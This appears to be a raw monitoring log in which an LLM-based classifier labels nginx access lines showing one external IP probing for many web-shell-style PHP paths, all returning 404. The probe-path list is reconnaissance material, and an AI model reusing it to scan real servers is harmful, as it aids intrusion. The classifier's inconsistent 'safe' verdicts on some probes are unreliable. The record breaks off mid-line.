Line=2026-03-20T12:46:05.587187672Z 10.0.1.9 - - [20/Mar/2026:12:46:05 +0000] "GET /44.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:01.987254 [observer] Pipeline: processed=5323 pattern_hits=5155 llm_calls=168 llm_errors=3 learned=3 Mar 20 12:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:01.987289 [observer] Patterns: hash=5155 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=168 Mar 20 12:52:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:11.955448 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=prefix Mar 20 12:52:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:11.955483 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern Mar 20 12:52:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:17.493839 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:52:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:17.493875 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=GET request for /xxw.php returning 404 could indicate probing for vulnerable or hidden PHP file names commonly used by scanners. 
Line=2026-03-20T12:46:05.726642368Z 10.0.1.9 - - [20/Mar/2026:12:46:05 +0000] "GET /xxw.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:52:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:24.059467 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.72 action=alert pattern_type= Mar 20 12:52:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:24.059505 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Er access to a PHP file path /sa.php7 returning 404 can indicate probing for vulnerable PHP endpoints. Line=2026-03-20T12:46:05.830463959Z 10.0.1.9 - - [20/Mar/2026:12:46:05 +0000] "GET /sa.php7 HTTP/1.0" 404 6603 "-" "-" "4.204.200.32" Mar 20 12:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:31.935455 [observer] Pipeline: processed=5328 pattern_hits=5157 llm_calls=171 llm_errors=3 learned=3 Mar 20 12:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:31.935477 [observer] Patterns: hash=5157 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=171 Mar 20 12:52:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:32.231805 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 20 12:52:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:32.231850 [analyzer] Source hint mismatch: LLM says "docker", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern Mar 20 12:52:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:41.338003 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:52:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:41.338043 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to a non-existent wp9.php page with 404 status may indicate probing 
for vulnerable PHP files. Line=2026-03-20T12:46:05.962761026Z 10.0.1.9 - - [20/Mar/2026:12:46:05 +0000] "GET /wp9.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:52:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:47.109807 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.60 action=alert pattern_type= Mar 20 12:52:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:47.109845 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to /wen.php returning 404; could indicate probing for common or vulnerable scripts Line=2026-03-20T12:46:06.028706842Z 10.0.1.9 - - [20/Mar/2026:12:46:06 +0000] "GET /wen.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:52:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:52.711383 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:52:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:52.711417 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a wp5.php request from a web server can indicate probing for WordPress-related files. Line=2026-03-20T12:46:06.095826601Z 10.0.1.9 - - [20/Mar/2026:12:46:06 +0000] "GET /wp5.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:52:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:58.038389 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:52:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:58.038426 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=GET request for /varb.php returning 404 from a web server; unusual filename may indicate probing for common PHP scripts. 
Line=2026-03-20T12:46:06.161902581Z 10.0.1.9 - - [20/Mar/2026:12:46:06 +0000] "GET /varb.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:01.957591 [observer] Pipeline: processed=5335 pattern_hits=5159 llm_calls=176 llm_errors=3 learned=3 Mar 20 12:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:01.957625 [observer] Patterns: hash=5159 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=176 Mar 20 12:53:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:03.794788 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:53:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:03.794850 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for /tt.php with external IP in request pattern may indicate probing for vulnerable PHP file. Line=2026-03-20T12:46:06.228416079Z 10.0.1.9 - - [20/Mar/2026:12:46:06 +0000] "GET /tt.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:53:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:14.038674 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 12:53:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:14.038711 [analyzer] Source hint mismatch: LLM says "webserver", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern Mar 20 12:53:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:23.263659 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:53:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:23.263698 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to /vx.php with 404 suggests probing for a potentially vulnerable 
PHP file. Line=2026-03-20T12:46:06.360306295Z 10.0.1.9 - - [20/Mar/2026:12:46:06 +0000] "GET /vx.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:53:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:30.515783 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 12:53:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:30.515822 [analyzer] Source hint mismatch: LLM says "docker", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern Mar 20 12:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:31.935139 [observer] Pipeline: processed=5343 pattern_hits=5163 llm_calls=180 llm_errors=3 learned=3 Mar 20 12:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:31.935182 [observer] Patterns: hash=5163 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=180 Mar 20 12:53:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:41.052036 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.64 action=alert pattern_type= Mar 20 12:53:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:41.052084 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access log shows a request to a random PHP file (8573.php) returning 404, which can indicate automated probing or vulnerability scanning. 
Line=2026-03-20T12:46:06.647735101Z 10.0.1.9 - - [20/Mar/2026:12:46:06 +0000] "GET /8573.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:53:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:47.159611 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:53:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:47.159647 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a suspicious path bolt.php suggests a potential probing or exploit attempt against a CMS-like endpoint. Line=2026-03-20T12:46:06.713731239Z 10.0.1.9 - - [20/Mar/2026:12:46:06 +0000] "GET /bolt.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:53:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:55.161558 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:53:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:53:55.161595 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 on a likely PHP file (/tfm.php) from an external IP; could indicate probing for vulnerable or misconfigured scripts. 
Line=2026-03-20T12:46:06.780650571Z 10.0.1.9 - - [20/Mar/2026:12:46:06 +0000] "GET /tfm.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:01.955504 [observer] Pipeline: processed=5348 pattern_hits=5165 llm_calls=183 llm_errors=3 learned=3 Mar 20 12:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:01.955640 [observer] Patterns: hash=5165 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=183 Mar 20 12:54:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:02.518371 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=prefix Mar 20 12:54:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:02.518418 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern Mar 20 12:54:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:12.825810 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:54:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:12.825854 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 on a WordPress admin CSS path from a container service suggests probing for admin endpoints; not definitive malicious activity but merits alerts. 
Line=2026-03-20T12:46:06.913995151Z 10.0.1.9 - - [20/Mar/2026:12:46:06 +0000] "GET /wp-admin/css/bolt.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:54:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:19.541479 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:54:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:19.541532 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a PHP file (nw.php) in a single request could indicate probing or misconfiguration; not a definitive attack but warrant attention. Line=2026-03-20T12:46:06.980502764Z 10.0.1.9 - - [20/Mar/2026:12:46:06 +0000] "GET //nw.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:31.934794 [observer] Pipeline: processed=5355 pattern_hits=5169 llm_calls=186 llm_errors=3 learned=3 Mar 20 12:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:31.934824 [observer] Patterns: hash=5169 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=186 Mar 20 12:54:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:35.340290 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.64 action=alert pattern_type= Mar 20 12:54:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:35.340327 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to /bnm.php returned 404, which can indicate probing for vulnerable/php info endpoints. Not clearly malicious but warrants monitoring. 
Line=2026-03-20T12:46:07.049874567Z 10.0.1.9 - - [20/Mar/2026:12:46:07 +0000] "GET /bnm.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:54:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:42.544760 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:54:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:42.544792 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A GET request for /nw.php returning 404 could indicate probing or attempted access to hidden/admin resources; not definitive malicious activity but warrants attention. Line=2026-03-20T12:46:07.116681355Z 10.0.1.9 - - [20/Mar/2026:12:46:07 +0000] "GET /nw.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:54:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:52.411530 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:54:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:54:52.411570 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for /s.php from external IP suggests probing or a web resource lookup pattern common in vulnerability scans. Line=2026-03-20T12:46:07.187090833Z 10.0.1.9 - - [20/Mar/2026:12:46:07 +0000] "GET /s.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:55:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:00.431992 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.60 action=alert pattern_type= Mar 20 12:55:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:00.432029 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a possibly targeted PHP file (hplfuns.php) from an internal host with an external IP in the log tail suggests probing for vulnerable scripts. 
Line=2026-03-20T12:46:07.261350601Z 10.0.1.9 - - [20/Mar/2026:12:46:07 +0000] "GET /hplfuns.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:01.973277 [observer] Pipeline: processed=5361 pattern_hits=5171 llm_calls=190 llm_errors=3 learned=3 Mar 20 12:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:01.973314 [observer] Patterns: hash=5171 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=190 Mar 20 12:55:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:04.581374 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.58 action=alert pattern_type= Mar 20 12:55:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:04.581412 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A GET request to /jp.php returning 404 can indicate automated probing for known web shells or vulnerable scripts; not definitive but warrants attention. Line=2026-03-20T12:46:07.327053422Z 10.0.1.9 - - [20/Mar/2026:12:46:07 +0000] "GET /jp.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:55:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:13.363111 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:55:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:13.363148 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A single 404 for /xsas.php suggests a targeted probe for a potentially sensitive PHP file. 
Line=2026-03-20T12:46:07.407178121Z 10.0.1.9 - - [20/Mar/2026:12:46:07 +0000] "GET /xsas.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:55:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:19.999297 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:55:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:19.999334 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to a PHP file (potentially probing for vulnerable scripts) returning 404, a common indicator of automated scans. Line=2026-03-20T12:46:07.514630316Z 10.0.1.9 - - [20/Mar/2026:12:46:07 +0000] "GET /5b9ac.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:55:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:30.246413 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:55:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:30.246443 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to /okxh.php returning 404 suggests probing for PHP file or misconfigured path; could be automated scanning. 
Line=2026-03-20T12:46:07.581497469Z 10.0.1.9 - - [20/Mar/2026:12:46:07 +0000] "GET /okxh.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:31.934722 [observer] Pipeline: processed=5369 pattern_hits=5175 llm_calls=194 llm_errors=3 learned=3 Mar 20 12:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:31.934748 [observer] Patterns: hash=5175 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=194 Mar 20 12:55:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:35.806215 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.72 action=alert pattern_type= Mar 20 12:55:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:35.806280 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=The log shows a 404 for a request to a suspicious PHP file (rzki.php) from a client IP, which can indicate probing or potential vulnerability scanning. Line=2026-03-20T12:46:07.648369706Z 10.0.1.9 - - [20/Mar/2026:12:46:07 +0000] "GET /rzki.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:55:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:44.673309 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:55:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:44.673350 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A GET request for a common sensitive path (edit.php) returning 404 suggests probing or targeted scanning activity rather than normal user traffic. 
Line=2026-03-20T12:46:07.724044225Z 10.0.1.9 - - [20/Mar/2026:12:46:07 +0000] "GET /edit.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:55:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:51.116368 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=prefix Mar 20 12:55:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:51.116402 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+) Mar 20 12:55:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:57.823541 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 12:55:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:55:57.823583 [analyzer] Source hint mismatch: LLM says "web_server", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern Mar 20 12:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:01.979703 [observer] Pipeline: processed=5375 pattern_hits=5177 llm_calls=198 llm_errors=3 learned=3 Mar 20 12:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:01.981082 [observer] Patterns: hash=5177 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=198 Mar 20 12:56:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:04.498594 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:56:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:04.498693 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for /66.php from an external IP to the service, with internal client IP present; could indicate probing or accidental hit rather than normal usage. 
Line=2026-03-20T12:46:08.038687789Z 10.0.1.9 - - [20/Mar/2026:12:46:08 +0000] "GET /66.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:56:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:14.198845 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=regex Mar 20 12:56:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:14.198879 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern Mar 20 12:56:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:19.004665 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:56:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:19.004702 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a specific PHP file path (ioxi-o.php) from an external IP; potential probing or misconfigured route, not clearly malicious but warrants monitoring Line=2026-03-20T12:46:08.180192504Z 10.0.1.9 - - [20/Mar/2026:12:46:08 +0000] "GET /ioxi-o.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:56:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:28.628016 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=contains Mar 20 12:56:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:28.628055 [analyzer] Source hint mismatch: LLM says "nginx_access", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern Mar 20 12:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:31.937085 [observer] Pipeline: processed=5382 pattern_hits=5180 llm_calls=202 llm_errors=3 learned=3 Mar 20 12:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:31.937109 [observer] Patterns: hash=5180 prefix=0 regex=0 contains=0 
deny=24 alert=431 suppress=0 misses=202 Mar 20 12:56:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:37.017095 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:56:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:37.017265 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to /sid3.php with 404 indicates a potential probe or misconfigured path. Line=2026-03-20T12:46:08.338216700Z 10.0.1.9 - - [20/Mar/2026:12:46:08 +0000] "GET /sid3.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:56:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:43.330680 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:56:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:43.330728 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=GET request for /d12.php resulting in 404; may indicate probing for PHP files or common exploits. 
Line=2026-03-20T12:46:08.436617947Z 10.0.1.9 - - [20/Mar/2026:12:46:08 +0000] "GET /d12.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:56:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:49.850705 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 12:56:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:49.850742 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern Mar 20 12:56:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:56.601998 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.64 action=alert pattern_type= Mar 20 12:56:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:56:56.602030 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 to wp-blog-header.php suggests probing for WordPress headers; could be automated scanner activity. 
Line=2026-03-20T12:46:08.575868527Z 10.0.1.9 - - [20/Mar/2026:12:46:08 +0000] "GET /wp-blog-header.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:01.975381 [observer] Pipeline: processed=5390 pattern_hits=5184 llm_calls=206 llm_errors=3 learned=3 Mar 20 12:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:01.975555 [observer] Patterns: hash=5184 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=206 Mar 20 12:57:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:03.443656 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:57:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:03.443705 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for /abc.php from client IPs suggests probing for common vulnerable files; not definitively malicious but warrants scrutiny. Line=2026-03-20T12:46:08.663007802Z 10.0.1.9 - - [20/Mar/2026:12:46:08 +0000] "GET /abc.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:57:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:12.326962 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: 